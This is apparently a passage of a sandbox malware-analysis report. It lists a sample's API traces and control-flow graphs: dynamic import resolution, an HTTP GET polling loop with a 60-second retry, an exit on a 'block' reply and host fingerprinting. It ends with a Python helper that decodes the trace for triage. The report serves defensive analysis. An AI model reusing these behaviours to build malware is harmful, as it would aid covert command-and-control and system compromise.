                                    • LoadLibraryA.KERNEL32(019DCC48,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A03D
                                    • LoadLibraryA.KERNEL32(019DCC60,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A04E
                                    • LoadLibraryA.KERNEL32(019DCC78,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A060
                                    • LoadLibraryA.KERNEL32(019DCCC0,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A072
                                    • LoadLibraryA.KERNEL32(019DCC90,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A083
                                    • LoadLibraryA.KERNEL32(019DCCA8,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A095
                                    • LoadLibraryA.KERNEL32(019DCE28,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A0A7
                                    • LoadLibraryA.KERNEL32(019DCE88,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A0B8
                                    • GetProcAddress.KERNEL32(75FD0000,019C6400), ref: 00C4A0DA
                                    • GetProcAddress.KERNEL32(75FD0000,019DCE10), ref: 00C4A0F2
                                    • GetProcAddress.KERNEL32(75FD0000,019D8850), ref: 00C4A10A
                                    • GetProcAddress.KERNEL32(75FD0000,019DCF78), ref: 00C4A123
                                    • GetProcAddress.KERNEL32(75FD0000,019C6420), ref: 00C4A13B
                                    • GetProcAddress.KERNEL32(73B60000,019CB1A8), ref: 00C4A160
                                    • GetProcAddress.KERNEL32(73B60000,019C64A0), ref: 00C4A179
                                    • GetProcAddress.KERNEL32(73B60000,019CB130), ref: 00C4A191
                                    • GetProcAddress.KERNEL32(73B60000,019DCF00), ref: 00C4A1A9
                                    • GetProcAddress.KERNEL32(73B60000,019DCE40), ref: 00C4A1C2
                                    • GetProcAddress.KERNEL32(73B60000,019C6500), ref: 00C4A1DA
                                    • GetProcAddress.KERNEL32(73B60000,019C6640), ref: 00C4A1F2
                                    • GetProcAddress.KERNEL32(73B60000,019DCF90), ref: 00C4A20B
                                    • GetProcAddress.KERNEL32(763B0000,019C6340), ref: 00C4A22C
                                    • GetProcAddress.KERNEL32(763B0000,019C6300), ref: 00C4A244
                                    • GetProcAddress.KERNEL32(763B0000,019DCE58), ref: 00C4A25D
                                    • GetProcAddress.KERNEL32(763B0000,019DCE70), ref: 00C4A275
                                    • GetProcAddress.KERNEL32(763B0000,019C6440), ref: 00C4A28D
                                    • GetProcAddress.KERNEL32(750F0000,019CB1D0), ref: 00C4A2B3
                                    • GetProcAddress.KERNEL32(750F0000,019CAF50), ref: 00C4A2CB
                                    • GetProcAddress.KERNEL32(750F0000,019DCED0), ref: 00C4A2E3
                                    • GetProcAddress.KERNEL32(750F0000,019C62E0), ref: 00C4A2FC
                                    • GetProcAddress.KERNEL32(750F0000,019C6460), ref: 00C4A314
                                    • GetProcAddress.KERNEL32(750F0000,019CB1F8), ref: 00C4A32C
                                    • GetProcAddress.KERNEL32(75A50000,019DCEA0), ref: 00C4A352
                                    • GetProcAddress.KERNEL32(75A50000,019C65A0), ref: 00C4A36A
                                    • GetProcAddress.KERNEL32(75A50000,019D88A0), ref: 00C4A382
                                    • GetProcAddress.KERNEL32(75A50000,019DCEB8), ref: 00C4A39B
                                    • GetProcAddress.KERNEL32(75A50000,019DCEE8), ref: 00C4A3B3
                                    • GetProcAddress.KERNEL32(75A50000,019C63C0), ref: 00C4A3CB
                                    • GetProcAddress.KERNEL32(75A50000,019C6620), ref: 00C4A3E4
                                    • GetProcAddress.KERNEL32(75A50000,019DCF18), ref: 00C4A3FC
                                    • GetProcAddress.KERNEL32(75A50000,019DCF30), ref: 00C4A414
                                    • GetProcAddress.KERNEL32(75070000,019C6600), ref: 00C4A436
                                    • GetProcAddress.KERNEL32(75070000,019DCF48), ref: 00C4A44E
                                    • GetProcAddress.KERNEL32(75070000,019DCFC0), ref: 00C4A466
                                    • GetProcAddress.KERNEL32(75070000,019DCF60), ref: 00C4A47F
                                    • GetProcAddress.KERNEL32(75070000,019DCFA8), ref: 00C4A497
                                    • GetProcAddress.KERNEL32(74E50000,019C6480), ref: 00C4A4B8
                                    • GetProcAddress.KERNEL32(74E50000,019C64C0), ref: 00C4A4D1
                                    • GetProcAddress.KERNEL32(75320000,019C6520), ref: 00C4A4F2
                                    • GetProcAddress.KERNEL32(75320000,019DC870), ref: 00C4A50A
                                    • GetProcAddress.KERNEL32(6F060000,019C6660), ref: 00C4A530
                                    • GetProcAddress.KERNEL32(6F060000,019C6540), ref: 00C4A548
                                    • GetProcAddress.KERNEL32(6F060000,019C6360), ref: 00C4A560
                                    • GetProcAddress.KERNEL32(6F060000,019DCA38), ref: 00C4A579
                                    • GetProcAddress.KERNEL32(6F060000,019C63E0), ref: 00C4A591
                                    • GetProcAddress.KERNEL32(6F060000,019C6380), ref: 00C4A5A9
                                    • GetProcAddress.KERNEL32(6F060000,019C64E0), ref: 00C4A5C2
                                    • GetProcAddress.KERNEL32(6F060000,019C6560), ref: 00C4A5DA
                                    • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00C4A5F1
                                    • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00C4A607
                                    • GetProcAddress.KERNEL32(74E00000,019DC930), ref: 00C4A629
                                    • GetProcAddress.KERNEL32(74E00000,019D8860), ref: 00C4A641
                                    • GetProcAddress.KERNEL32(74E00000,019DC8B8), ref: 00C4A659
                                    • GetProcAddress.KERNEL32(74E00000,019DCAC8), ref: 00C4A672
                                    • GetProcAddress.KERNEL32(74DF0000,019C6320), ref: 00C4A693
                                    • GetProcAddress.KERNEL32(6F9C0000,019DC858), ref: 00C4A6B4
                                    • GetProcAddress.KERNEL32(6F9C0000,019C63A0), ref: 00C4A6CD
                                    • GetProcAddress.KERNEL32(6F9C0000,019DC888), ref: 00C4A6E5
                                    • GetProcAddress.KERNEL32(6F9C0000,019DC960), ref: 00C4A6FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
• Associated: same set of dump files as listed under the first function above
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: c3bd9a9a67b15c39f075053cc835c43c0d28ec1fd49f2dcc80478b9d0b3aca6e
                                    • Instruction ID: 191d0d4bae6f16a54aede8f015aa2c696e7153d6488983568b3224a9246f26f6
                                    • Opcode Fuzzy Hash: c3bd9a9a67b15c39f075053cc835c43c0d28ec1fd49f2dcc80478b9d0b3aca6e
                                    • Instruction Fuzzy Hash: 5E624AB5504201AFD348DFAAED8995E37F9F7C820171C853AE61DE3224D63998C9DB13

Control-flow Graph (node list exported from the rendered graph; the executed / not-executed colouring of the image is not preserved). Each entry is `node-id start-end [APIs called in the block]`, followed by `src->dst` edges:

                                    control_flow_graph 1033 c36280-c3630b call c4a7a0 call c347b0 call c4a740 InternetOpenA StrCmpCA 1040 c36314-c36318 1033->1040 1041 c3630d 1033->1041 1042 c36509-c36525 call c4a7a0 call c4a800 * 2 1040->1042 1043 c3631e-c36342 InternetConnectA 1040->1043 1041->1040 1062 c36528-c3652d 1042->1062 1045 c36348-c3634c 1043->1045 1046 c364ff-c36503 InternetCloseHandle 1043->1046 1048 c3635a 1045->1048 1049 c3634e-c36358 1045->1049 1046->1042 1050 c36364-c36392 HttpOpenRequestA 1048->1050 1049->1050 1052 c364f5-c364f9 InternetCloseHandle 1050->1052 1053 c36398-c3639c 1050->1053 1052->1046 1055 c363c5-c36405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 c3639e-c363bf InternetSetOptionA 1053->1056 1058 c36407-c36427 call c4a740 call c4a800 * 2 1055->1058 1059 c3642c-c3644b call c48940 1055->1059 1056->1055 1058->1062 1067 c364c9-c364e9 call c4a740 call c4a800 * 2 1059->1067 1068 c3644d-c36454 1059->1068 1067->1062 1071 c364c7-c364ef InternetCloseHandle 1068->1071 1072 c36456-c36480 InternetReadFile 1068->1072 1071->1052 1073 c36482-c36489 1072->1073 1074 c3648b 1072->1074 1073->1074 1078 c3648d-c364c5 call c4a9b0 call c4a8a0 call c4a800 1073->1078 1074->1071 1078->1072
                                    APIs
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                      • Part of subcall function 00C347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • InternetOpenA.WININET(00C50DFE,00000001,00000000,00000000,00000000), ref: 00C362E1
                                    • StrCmpCA.SHLWAPI(?,019DE580), ref: 00C36303
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C36335
                                    • HttpOpenRequestA.WININET(00000000,GET,?,019DDC28,00000000,00000000,00400100,00000000), ref: 00C36385
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C363BF
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C363D1
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00C363FD
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C3646D
                                    • InternetCloseHandle.WININET(00000000), ref: 00C364EF
                                    • InternetCloseHandle.WININET(00000000), ref: 00C364F9
                                    • InternetCloseHandle.WININET(00000000), ref: 00C36503
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
• Associated: same set of dump files as listed under the first function above
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: e17c6b8eb69b09c6911a61566ea69d84df5a40e244642518d16a8f94a42369bf
                                    • Instruction ID: 04078953bf938df15bcc01f89e04dc2b4793425046c7aa88e5fee91e870fd282
                                    • Opcode Fuzzy Hash: e17c6b8eb69b09c6911a61566ea69d84df5a40e244642518d16a8f94a42369bf
                                    • Instruction Fuzzy Hash: 01717071A50218AFEB24DFA1CC49BEE7778FB44700F1081A8F5096B1D0DBB46A89DF51

Control-flow Graph (node list exported from the rendered graph; the executed / not-executed colouring of the image is not preserved). Each entry is `node-id start-end [APIs called in the block]`, followed by `src->dst` edges:

                                    control_flow_graph 1090 c45510-c45577 call c45ad0 call c4a820 * 3 call c4a740 * 4 1106 c4557c-c45583 1090->1106 1107 c45585-c455b6 call c4a820 call c4a7a0 call c31590 call c451f0 1106->1107 1108 c455d7-c4564c call c4a740 * 2 call c31590 call c452c0 call c4a8a0 call c4a800 call c4aad0 StrCmpCA 1106->1108 1124 c455bb-c455d2 call c4a8a0 call c4a800 1107->1124 1134 c45693-c456a9 call c4aad0 StrCmpCA 1108->1134 1138 c4564e-c4568e call c4a7a0 call c31590 call c451f0 call c4a8a0 call c4a800 1108->1138 1124->1134 1139 c457dc-c45844 call c4a8a0 call c4a820 * 2 call c31670 call c4a800 * 4 call c46560 call c31550 1134->1139 1140 c456af-c456b6 1134->1140 1138->1134 1269 c45ac3-c45ac6 1139->1269 1142 c456bc-c456c3 1140->1142 1143 c457da-c4585f call c4aad0 StrCmpCA 1140->1143 1147 c456c5-c45719 call c4a820 call c4a7a0 call c31590 call c451f0 call c4a8a0 call c4a800 1142->1147 1148 c4571e-c45793 call c4a740 * 2 call c31590 call c452c0 call c4a8a0 call c4a800 call c4aad0 StrCmpCA 1142->1148 1162 c45865-c4586c 1143->1162 1163 c45991-c459f9 call c4a8a0 call c4a820 * 2 call c31670 call c4a800 * 4 call c46560 call c31550 1143->1163 1147->1143 1148->1143 1246 c45795-c457d5 call c4a7a0 call c31590 call c451f0 call c4a8a0 call c4a800 1148->1246 1169 c45872-c45879 1162->1169 1170 c4598f-c45a14 call c4aad0 StrCmpCA 1162->1170 1163->1269 1177 c458d3-c45948 call c4a740 * 2 call c31590 call c452c0 call c4a8a0 call c4a800 call c4aad0 StrCmpCA 1169->1177 1178 c4587b-c458ce call c4a820 call c4a7a0 call c31590 call c451f0 call c4a8a0 call c4a800 1169->1178 1198 c45a16-c45a21 Sleep 1170->1198 1199 c45a28-c45a91 call c4a8a0 call c4a820 * 2 call c31670 call c4a800 * 4 call c46560 call c31550 1170->1199 1177->1170 1275 c4594a-c4598a call c4a7a0 call c31590 call c451f0 call c4a8a0 call c4a800 1177->1275 1178->1170 1198->1106 1199->1269 1246->1143 1275->1170
                                    APIs
                                      • Part of subcall function 00C4A820: lstrlen.KERNEL32(00C34F05,?,?,00C34F05,00C50DDE), ref: 00C4A82B
                                      • Part of subcall function 00C4A820: lstrcpy.KERNEL32(00C50DDE,00000000), ref: 00C4A885
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C45644
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C456A1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C45857
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C45228
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C45318
                                      • Part of subcall function 00C452C0: lstrlen.KERNEL32(00000000), ref: 00C4532F
                                      • Part of subcall function 00C452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00C45364
                                      • Part of subcall function 00C452C0: lstrlen.KERNEL32(00000000), ref: 00C45383
                                      • Part of subcall function 00C452C0: lstrlen.KERNEL32(00000000), ref: 00C453AE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C4578B
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C45940
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C45A0C
                                    • Sleep.KERNEL32(0000EA60), ref: 00C45A1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
• Associated: same set of dump files as listed under the first function above
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: 28ca5fe1dee37807d923bde4d3d99bcd04d412a287ff74fd70a68797628a0f84
                                    • Instruction ID: c8a9da924e0a793bb80128a22b504f5d64081eca1e2fb0f7bf29fddeea04b1d2
                                    • Opcode Fuzzy Hash: 28ca5fe1dee37807d923bde4d3d99bcd04d412a287ff74fd70a68797628a0f84
                                    • Instruction Fuzzy Hash: B2E120729501049BEB14FBB1DC96AED7378FF94300F548128B906A61D2EF346B4DEB92
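The three API listings above (the LoadLibraryA/GetProcAddress resolver at c49c10, the WinINet GET routine at c36280 and the StrCmpCA/Sleep polling loop at c45510) are easier to read once the raw arguments are decoded. The script below is an added triage helper, not part of the Joe Sandbox report and not code from the sample: it parses the report's `API.MODULE(args), ref: addr` lines, counts GetProcAddress calls per module base, lists the import names the sandbox could print as text (the rest appear only as pointers, and `?` marks arguments the sandbox did not render), and maps the numeric WinINet arguments (access type 1, service 3, request flags 0x00400100, option 0x1F, query level 0x13, read size 0x7CF) and the Sleep interval to their documented wininet.h / kernel32 meanings. The `TRACE` string is a constructed excerpt copied from the listings above, not a complete trace; the constant names come from Microsoft's published header values, the trace itself only shows the numbers.

```python
import re
from collections import Counter
from typing import Dict, List, NamedTuple

# Constructed excerpt of the report's "APIs" lines for the three functions
# above (same line format, values copied from the listings; not a full trace).
TRACE = """\
• GetProcAddress.KERNEL32(75900000,019C6980), ref: 00C49C2D
• GetProcAddress.KERNEL32(75900000,019C69A0), ref: 00C49C45
• LoadLibraryA.KERNEL32(019DCC48,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A03D
• GetProcAddress.KERNEL32(75FD0000,019C6400), ref: 00C4A0DA
• GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00C4A5F1
• GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00C4A607
• InternetOpenA.WININET(00C50DFE,00000001,00000000,00000000,00000000), ref: 00C362E1
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C36335
• HttpOpenRequestA.WININET(00000000,GET,?,019DDC28,00000000,00000000,00400100,00000000), ref: 00C36385
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C363BF
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00C363FD
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C3646D
• StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C45A0C
• Sleep.KERNEL32(0000EA60), ref: 00C45A1B
"""

LINE_RE = re.compile(r"^\s*(?:•\s*)?(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")
HEX32_RE = re.compile(r"^[0-9A-Fa-f]{8}$")  # how the report prints raw DWORDs / pointers

# Documented wininet.h values; the trace shows only the numbers, the names are ours.
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
INTERNET_OPTION = {31: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_QUERY = {19: "HTTP_QUERY_STATUS_CODE"}
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID", 0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}


class Call(NamedTuple):
    api: str
    module: str
    args: List[str]
    ref: int


def parse_trace(text: str) -> List[Call]:
    """Parse report bullet lines into Call records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        api, module, argstr, ref = m.groups()
        args = [a.strip() for a in argstr.split(",")] if argstr else []
        calls.append(Call(api, module, args, int(ref, 16)))
    return calls


def resolver_profile(calls: List[Call]) -> Dict[str, object]:
    """GetProcAddress calls per module base, LoadLibraryA count, and the import
    names the sandbox printed as text (all others were only pointers)."""
    per_base: Counter = Counter()
    plaintext: List[str] = []
    loads = 0
    for c in calls:
        if c.api == "GetProcAddress" and len(c.args) >= 2:
            per_base[c.args[0]] += 1
            if c.args[1] != "?" and not HEX32_RE.match(c.args[1]):
                plaintext.append(c.args[1])
        elif c.api == "LoadLibraryA":
            loads += 1
    return {"per_base": dict(per_base), "loadlibrary_calls": loads, "plaintext_names": plaintext}


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Names of the known bits set in value; any unknown bits are appended as hex."""
    names = [name for bit, name in table.items() if value & bit]
    unknown = value & ~sum(table)
    if unknown:
        names.append(f"0x{unknown:08X}")
    return names


def _hex(arg: str) -> int:
    return int(arg, 16)


def decode_wininet(calls: List[Call]) -> Dict[str, object]:
    """Translate the numeric arguments of the WinINet, StrCmpCA and Sleep calls."""
    out: Dict[str, object] = {}
    for c in calls:
        if c.api == "InternetOpenA":
            out["access_type"] = INTERNET_OPEN_TYPE.get(_hex(c.args[1]), c.args[1])
        elif c.api == "InternetConnectA":
            out["service"] = INTERNET_SERVICE.get(_hex(c.args[5]), c.args[5])
        elif c.api == "HttpOpenRequestA":
            out["verb"] = c.args[1]
            out["request_flags"] = decode_flags(_hex(c.args[6]), INTERNET_FLAGS)
        elif c.api == "InternetSetOptionA":
            out["option"] = INTERNET_OPTION.get(_hex(c.args[1]), c.args[1])
        elif c.api == "HttpQueryInfoA":
            out["query"] = HTTP_QUERY.get(_hex(c.args[1]), c.args[1])
        elif c.api == "InternetReadFile":
            out["read_chunk"] = _hex(c.args[2])
        elif c.api == "StrCmpCA":
            out.setdefault("response_checks", []).append(c.args[1])
        elif c.api == "Sleep":
            out["sleep_seconds"] = _hex(c.args[0]) / 1000
    return out


if __name__ == "__main__":
    calls = parse_trace(TRACE)
    print(resolver_profile(calls))
    print(decode_wininet(calls))
```

Run against the full listings, the resolver profile shows that only `InternetSetOptionA` and `HttpQueryInfoA` reach GetProcAddress as printable strings; every other name is a pointer into memory outside the image (the image is mapped at 00C30000, the name buffers sit at 019Cxxxx/019Dxxxx), which is what the report's "Extensive use of GetProcAddress" and "Found potential string decryption" signatures describe. The WinINet decode gives a direct (non-proxy) HTTP session, a `GET` with `INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE`, a 4-byte `INTERNET_OPTION_SECURITY_FLAGS` write before the request (the flag value itself is not in the trace, so the script reports the option, not what it relaxes), a status-code query, 0x7CF-byte reads, and a 60-second Sleep after the `ERROR` comparison, which is the retry interval of the loop edge 1198->1106 back to c4557c.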

Control-flow Graph (node list exported from the rendered graph; the executed / not-executed colouring of the image is not preserved). Each entry is `node-id start-end [APIs called in the block]`, followed by `src->dst` edges:

                                    control_flow_graph 1301 c417a0-c417cd call c4aad0 StrCmpCA 1304 c417d7-c417f1 call c4aad0 1301->1304 1305 c417cf-c417d1 ExitProcess 1301->1305 1309 c417f4-c417f8 1304->1309 1310 c419c2-c419cd call c4a800 1309->1310 1311 c417fe-c41811 1309->1311 1313 c41817-c4181a 1311->1313 1314 c4199e-c419bd 1311->1314 1316 c41821-c41830 call c4a820 1313->1316 1317 c418ad-c418be StrCmpCA 1313->1317 1318 c418cf-c418e0 StrCmpCA 1313->1318 1319 c4198f-c41999 call c4a820 1313->1319 1320 c41849-c41858 call c4a820 1313->1320 1321 c41835-c41844 call c4a820 1313->1321 1322 c41970-c41981 StrCmpCA 1313->1322 1323 c418f1-c41902 StrCmpCA 1313->1323 1324 c41951-c41962 StrCmpCA 1313->1324 1325 c41932-c41943 StrCmpCA 1313->1325 1326 c41913-c41924 StrCmpCA 1313->1326 1327 c4185d-c4186e StrCmpCA 1313->1327 1328 c4187f-c41890 StrCmpCA 1313->1328 1314->1309 1316->1314 1348 c418c0-c418c3 1317->1348 1349 c418ca 1317->1349 1350 c418e2-c418e5 1318->1350 1351 c418ec 1318->1351 1319->1314 1320->1314 1321->1314 1338 c41983-c41986 1322->1338 1339 c4198d 1322->1339 1329 c41904-c41907 1323->1329 1330 c4190e 1323->1330 1335 c41964-c41967 1324->1335 1336 c4196e 1324->1336 1333 c41945-c41948 1325->1333 1334 c4194f 1325->1334 1331 c41926-c41929 1326->1331 1332 c41930 1326->1332 1344 c41870-c41873 1327->1344 1345 c4187a 1327->1345 1346 c41892-c4189c 1328->1346 1347 c4189e-c418a1 1328->1347 1329->1330 1330->1314 1331->1332 1332->1314 1333->1334 1334->1314 1335->1336 1336->1314 1338->1339 1339->1314 1344->1345 1345->1314 1355 c418a8 1346->1355 1347->1355 1348->1349 1349->1314 1350->1351 1351->1314 1355->1314
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00C417C5
                                    • ExitProcess.KERNEL32 ref: 00C417D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: ec49767d3632c52e70e2f5a4dc1759b5ffaaa138cd7743f21682e90a7f9e97bf
                                    • Instruction ID: 79f807f2edb38d479b943eda3385a643f34320c7addf49920a5f08a8241d1153
                                    • Opcode Fuzzy Hash: ec49767d3632c52e70e2f5a4dc1759b5ffaaa138cd7743f21682e90a7f9e97bf
                                    • Instruction Fuzzy Hash: 2F519CB4B1020AEFDB04DFA1D954BBE77B5BF54304F188058E846A7380D770EA85DB62

                                    Control-flow Graph (graph rendering omitted; entry block c47500-c4754a)
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00C47542
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C4757F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47603
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C4760A
                                    • wsprintfA.USER32 ref: 00C47640
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
